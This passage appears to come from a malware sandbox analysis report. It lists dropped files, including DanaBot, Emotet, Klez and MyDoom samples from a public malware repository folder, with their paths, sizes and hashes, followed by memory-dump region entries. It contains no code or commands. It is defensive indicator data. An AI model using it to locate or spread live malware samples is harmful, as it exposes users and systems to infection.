SHA1
28e14c84d0ccf63258bf8d78b409fcebedea30a4

SHA256
c8dceae03403730f5e98e742f0be9a6136e0d280fdea4c8803650756d7ff2998

SHA512
d788853cac3a042704ea23c5858f613656439d9dddf712c900e094a16d4fb601851e071ce80fd406b70a7b253e6dcc0cbcadd108b17a8b345e40b5374960962f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\90229F65.wmf

Filesize
430B

MD5
a550b61f07b1470b73c44807d0a87345

SHA1
a73a6b4b5c3601642fbf3f06a7d026daa1dab540

SHA256
9daf97cc8f5cf6b5f231f059caf39877aa572d646da43a68f47aada133c4ec4d

SHA512
1ceb29a5f816279bb3766422b2f301c324b30f3c94918f51235b5598459271f3291535ea6f317ee3861f4024623ea4433eeaa7c5de96eb1d90e2d0574c55bbef

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD9477.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s3wxlmx0.n3h.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
388B

MD5
8ae5932c942ebd62b8a7b8fc35ffd173

SHA1
08e451442385c82f9ef0265c5814dba576dcce94

SHA256
c0b97f9735de7d2ee0bcb736b2b840ff1540400be8f8380483388433457327ed

SHA512
8a23683f6bb6ccf97a99fba6f5d704ac007122a27d5d4a670512c1fff9dc6d297ce02393d635eac2e94dbcd5fde79e8edde1fafe85bb2f8ba1e5d9d4620ce1a5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
2KB

MD5
8348b115aa5877a6bb4564a12efbb468

SHA1
f8978d73f4d2f1cd731ba16ed7acdeeb732aa209

SHA256
ed02e423a506c9a3084df658472be63323832271289b84017168280172143096

SHA512
4d24f59f110c84d9097e5eabf8ef1339ddee51cff4f66827e1cb45be73eba679b0d7e3cbe0d4e1ad1a5aa791819054318426f19aa712cc267450760dad286aa6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
24b1dde13460aec8995b2517c373d026

SHA1
997951ab24d30548be3da4882103616bf2eba4d5

SHA256
507b798fe3fa390806875bcb2c2e307d1aed67258763710860d0bcd57f9f12b6

SHA512
e64f110cf53231158a36ed73e3a520f5715b624fd4ca8c50b82a4a458bfd6b26546ee1c11edc9ca4381a18aad0839b2b7eefebfe497c2136cf8c24e816353d5c

Download Submit
C:\Users\Admin\DOWNLO~1\THE-MA~1\BANKIN~1\DanaBot.dll

Filesize
2.4MB

MD5
7e76f7a5c55a5bc5f5e2d7a9e886782b

SHA1
fc500153dba682e53776bef53123086f00c0e041

SHA256
abd75572f897cdda88cec22922d15b509ee8c840fa5894b0aecbef6de23908a3

SHA512
0318e0040f4dbf954f27fb10a69bce2248e785a31d855615a1eaf303a772ad51d47906a113605d7bfd3c2b2265bf83c61538f78b071f85ee3c4948f5cde3fb24

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe

Filesize
2.7MB

MD5
48d8f7bbb500af66baa765279ce58045

SHA1
2cdb5fdeee4e9c7bd2e5f744150521963487eb71

SHA256
db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1

SHA512
aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Banking-Malware\Emotet.zip

Filesize
102KB

MD5
510f114800418d6b7bc60eebd1631730

SHA1
acb5bc4b83a7d383c161917d2de137fd6358aabd

SHA256
f62125428644746f081ca587ffa9449513dd786d793e83003c1f9607ca741c89

SHA512
6fe51c58a110599ea5d7f92b4b17bc2746876b4b5b504e73d339776f9dfa1c9154338d6793e8bf75b18f31eb677afd3e0c1bd33e40ac58e8520acbb39245af1a

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Banking-Malware\[email protected]

Filesize
139KB

MD5
b92021ca10aed3046fc3be5ac1c2a094

SHA1
0fb1ad5b53cdd09a7268c823ec796a6e623f086f

SHA256
c378387344e0a552dc065de6bfa607fd26e0b5c569751c79fbf9c6f2e91c9807

SHA512
bbeb5cfd7c5a890456b0805234a9ae325abc4a08dbad70b4ed1b3635dee4470a1f86869d5532809cecb595b9a89708f378921d733bd061aef693bfc5ee77ebb4

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Browser Hijackers\BabylonToolbar.txt

Filesize
57B

MD5
2ab0eb54f6e9388131e13a53d2c2af6c

SHA1
f64663b25c9141b54fe4fad4ee39e148f6d7f50a

SHA256
d24eee3b220c71fced3227906b0feed755d2e2b39958dd8cd378123dde692426

SHA512
6b5048eeff122ae33194f3f6089418e3492118288038007d62cdd30a384c79874c0728a2098a29d8ce1a9f2b4ba5f9683b3f440f85196d50dc8bc1275a909260

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Email-Worm\Klez.e.exe

Filesize
86KB

MD5
f2db87b351770e5995e9fcaad47d9591

SHA1
4c75bd93f458096fbc27fa852e16ce25a602f267

SHA256
3113fa9a3cf00ed423a2c686a2ffb19586f6a047747de65a93436a7dca8fcfa7

SHA512
608e74274b555a239534a9d43514e07cb8aad9b13baf4cc383e8c21ea4e9ebd36162dc0b4bf30a0975c334facf23d6e63742e2bbe4ba400e80d9f191893a84fc

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Email-Worm\MyDoom.A.exe

Filesize
22KB

MD5
53df39092394741514bc050f3d6a06a9

SHA1
f91a4d7ac276b8e8b7ae41c22587c89a39ddcea5

SHA256
fff0ccf5feaf5d46b295f770ad398b6d572909b00e2b8bcd1b1c286c70cd9151

SHA512
9792017109cf6ffc783e67be2a4361aa2c0792a359718434fec53e83feed6a9a2f0f331e9951f798e7fb89421fdc1ac0e083527c3d3b6dd71b7fdd90836023a0

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\Windows-KB2670838.msu.exe

Filesize
728KB

MD5
6e49c75f701aa059fa6ed5859650b910

SHA1
ccb7898c509c3a1de96d2010d638f6a719f6f400

SHA256
f91f02fd27ada64f36f6df59a611fef106ff7734833dea825d0612e73bdfb621

SHA512
ccd1b581a29de52d2313a97eb3c3b32b223dba1e7a49c83f7774b374bc2d16b13fba9566de6762883f3b64ed8e80327b454e5d32392af2a032c22653fed0fff8

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\WindowsUpdate.exe

Filesize
760KB

MD5
515198a8dfa7825f746d5921a4bc4db9

SHA1
e1da0b7f046886c1c4ff6993f7f98ee9a1bc90ae

SHA256
0fda176b199295f72fafc3bc25cefa27fa44ed7712c3a24ca2409217e430436d

SHA512
9e47037fe40b79ebf056a9c6279e318d85da9cd7e633230129d77a1b8637ecbafc60be38dd21ca9077ebfcb9260d87ff7fcc85b8699b3135148fe956972de3e8

Download Submit
C:\Windows\SysWOW64\Winkqjf.exe

Filesize
84KB

MD5
7d4c9067c11bc74d860256c4509c345a

SHA1
54871656efe605c2b8c86f68515d8fdbdd5dc576

SHA256
1f98d8949b187c6efae7f88b46b62e6e77a147daf787c725d46cdc30b90d3f83

SHA512
f2cea0abba3c324a4c3da3bb3678baf75dd273c5216d6a94fc08742afbb7ebc05ea41cb4fc9c8a03181e599599048dac60c2f992a2db153ddec41de67393bc85

Download Submit
C:\Windows\SysWOW64\shimgapi.dll

Filesize
4KB

MD5
8750df7c3d110ebc870f7afe319426e6

SHA1
a770fff05a829f666517a5f42e44785d6f0b4ae7

SHA256
fa3f934083746a702de18b927284f0145d4b82a92f2111693e93a4f762b50c00

SHA512
dfcbc2ba358ec40143e842d5242781a59943e646f50c41010a8cc4e2c5a15d5b19dcd2ee9556a0317ca73283e84d1f9d1b0b8b7470b493fe38e4e027336b8a2a

Download Submit
\??\pipe\LOCAL\crashpad_1480_BIZPDTYRIDGWTVVV

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1280-827-0x0000000002600000-0x000000000286B000-memory.dmp

Filesize
2.4MB

Download
memory/1280-1090-0x0000000002600000-0x000000000286B000-memory.dmp

Filesize
2.4MB

Download
memory/1280-813-0x0000000002600000-0x000000000286B000-memory.dmp

Filesize
2.4MB

Download
memory/2100-1020-0x00000239E7960000-0x00000239E7A62000-memory.dmp

Filesize
1.0MB

Download
memory/2100-1041-0x00000239CF4D0000-0x00000239CF510000-memory.dmp

Filesize
256KB

Download
memory/2100-1015-0x00000239CF4A0000-0x00000239CF4C2000-memory.dmp

Filesize
136KB

Download
memory/2100-1014-0x00000239CF380000-0x00000239CF390000-memory.dmp

Filesize
64KB

Download
memory/2100-1004-0x00000239E75C0000-0x00000239E7642000-memory.dmp

Filesize
520KB

Download
memory/2720-833-0x00007FF9EE330000-0x00007FF9EE340000-memory.dmp

Filesize
64KB

Download
memory/2720-832-0x00007FF9F0C90000-0x00007FF9F0CA0000-memory.dmp

Filesize
64KB

Download
memory/2720-831-0x00007FF9F0C90000-0x00007FF9F0CA0000-memory.dmp

Filesize
64KB

Download
memory/2720-829-0x00007FF9F0C90000-0x00007FF9F0CA0000-memory.dmp

Filesize
64KB

Download
memory/2720-830-0x00007FF9F0C90000-0x00007FF9F0CA0000-memory.dmp

Filesize
64KB

Download
memory/2720-828-0x00007FF9F0C90000-0x00007FF9F0CA0000-memory.dmp

Filesize
64KB

Download
memory/2720-834-0x00007FF9EE330000-0x00007FF9EE340000-memory.dmp

Filesize
64KB

Download
memory/3024-1404-0x00000000052B0000-0x00000000052BA000-memory.dmp

Filesize
40KB

Download
memory/3024-1403-0x0000000005110000-0x00000000051A2000-memory.dmp

Filesize
584KB

Download
memory/3024-1402-0x00000000055E0000-0x0000000005B84000-memory.dmp

Filesize
5.6MB

Download
memory/3024-1401-0x0000000000690000-0x000000000074C000-memory.dmp

Filesize
752KB

Download
memory/5228-1387-0x0000000000400000-0x00000000006BC000-memory.dmp

Filesize
2.7MB

Download
memory/5228-1406-0x0000000000400000-0x00000000006BC000-memory.dmp

Filesize
2.7MB

Download
memory/5456-295-0x00007FFA08610000-0x00007FFA096C0000-memory.dmp

Filesize
16.7MB

Download
memory/5456-292-0x00007FF7C5590000-0x00007FF7C5688000-memory.dmp

Filesize
992KB

Download
memory/5456-294-0x00007FFA0CDF0000-0x00007FFA0D0A6000-memory.dmp

Filesize
2.7MB

Download
memory/5456-293-0x00007FFA0E2F0000-0x00007FFA0E324000-memory.dmp

Filesize
208KB

Download
memory/5984-814-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/6024-262-0x000002266C6C0000-0x000002266C6C1000-memory.dmp

Filesize
4KB

Download
memory/6024-261-0x000002266C6B0000-0x000002266C6B1000-memory.dmp

Filesize
4KB

Download
memory/6024-259-0x000002266C620000-0x000002266C621000-memory.dmp

Filesize
4KB

Download
memory/6024-257-0x000002266C620000-0x000002266C621000-memory.dmp

Filesize
4KB

Download
memory/6024-255-0x000002266C5A0000-0x000002266C5A1000-memory.dmp

Filesize
4KB

Download
memory/6024-244-0x0000022664270000-0x0000022664280000-memory.dmp

Filesize
64KB

Download
memory/6024-263-0x000002266C6C0000-0x000002266C6C1000-memory.dmp

Filesize
4KB

Download
memory/6024-260-0x000002266C6B0000-0x000002266C6B1000-memory.dmp

Filesize
4KB

Download
memory/6024-248-0x00000226642B0000-0x00000226642C0000-memory.dmp

Filesize
64KB

Download
memory/6076-1329-0x00000000004A0000-0x00000000004AD000-memory.dmp

Filesize
52KB

Download
memory/6076-1338-0x000000007E1A0000-0x000000007E1A7000-memory.dmp

Filesize
28KB

Download
memory/6076-1336-0x00000000004A0000-0x00000000004AD000-memory.dmp

Filesize
52KB

Download
memory/6076-1334-0x000000007E1A0000-0x000000007E1A7000-memory.dmp

Filesize
28KB

Download